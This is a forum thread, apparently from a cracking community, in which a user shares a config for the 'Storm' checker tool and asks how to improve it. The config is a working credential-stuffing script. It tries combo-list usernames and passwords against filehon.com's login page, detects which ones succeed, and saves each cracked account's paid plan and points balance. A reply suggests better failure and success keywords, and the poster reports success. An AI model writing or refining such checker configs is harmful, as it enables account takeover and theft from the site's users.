Storm question

ioiioi

Lurker
Member
Joined
Threads
24
Posts
126
What should I add?


Free source


Premium Source


Free test


Premium test



Config

Code:
[General]
UseProxy = False
UseGlobalKeywords = False
DefaultTimeout = 10
UnbanAllProxiesWhenAllBannedAfter = 10
HitsFolderName = 333

[Stage-1]
Variable-1 = $Link1 = "http://filehon.com/member/loginCheck.php"
Variable-2 = $Heads1 = "Host: filehon.com\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\nAccept: text/htmlchr(Comma)application/xhtml+xmlchr(Comma)application/xml;q=0.9chr(Comma)*/*;q=0.8\nReferer: http://filehon.com/\nContent-Type: application/x-www-form-urlencoded\nConnection: close\nUpgrade-Insecure-Requests: 1"
Variable-3 = $PostContent1 = combinetext("Frame_login=Ok&sReturnUri=http%253A%252F%252Ffilehon.com%252F&m_id=",$ComboUsername#,"&m_pwd=",$ComboPassword#,"&idSave=1")
Variable-4 = $RedKey = findtagval($stage1ResponseSource#,"parent.location.href = '","';")
Variable-5 = $CondUrl = len($RedKey#) > 0
Variable-6 = $FailKey = "alert('"
Variable-7 = $IndexOfFailKey = indexof($stage1responseSource#, $FailKey#)
Variable-8 = $FailureConditionStage1CBAuto = $IndexOfFailKey# > 0
Condition = Any
Link = $Link1#
isFTP = False
HTTPVersion = 1.1
FollowRedirect = False
HTTPRequestMethod = POST
Headers = $Heads1#
PostContent = $PostContent1#
Failure-Condition = $FailureConditionStage1CBAuto#

[Stage-2]
Variable-1 = $Link2 = "http://filehon.com/mypage/index.php"
Variable-2 = $Heads2 = "Host: filehon.com\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\nAccept: text/htmlchr(Comma)application/xhtml+xmlchr(Comma)application/xml;q=0.9chr(Comma)*/*;q=0.8\nReferer: http://filehon.com/\nContent-Type: application/x-www-form-urlencoded\nConnection: close\nUpgrade-Insecure-Requests: 1"
Variable-3 = $Successkey = "chr(double quotes)/member/logout.phpchr(double quotes)"
Variable-4 = $IndexOfSuccesskey = indexof($Stage2ResponseSource#, $Successkey#)
Variable-5 = $Capture1 = findtagval($stage2responsesource#,"<dd class=chr(double quotes)remainchr(double quotes)>", "</dd>")
Variable-6 = $Capture2 = findtagval($stage2responsesource#,"<span id=chr(double quotes)have_pointchr(double quotes)>", "</span></a></dd>")
Variable-7 = $SaveFormat = combinetext("User = ", $ComboUsername#, "\nPassword = ", $ComboPassword#, "\n정액제 = ", $Capture1#, "\n포인트 = ", $Capture2#)
Variable-8 = $SuccessConditionStage2CBAuto = $IndexOfSuccesskey# >= 0
Condition = $CondUrl#
Link = $Link2#
isFTP = False
HTTPVersion = 1.1
FollowRedirect = True
HTTPRequestMethod = GET
Headers = $Heads2#
Success-Condition = $SuccessConditionStage2CBAuto#
 
what you can do is:
- add different failure keys
- choose different success keyword
- add free-condition variable
 
  • Thread Starter Thread Starter
  • #4
musica22
This has been a success.
Thank you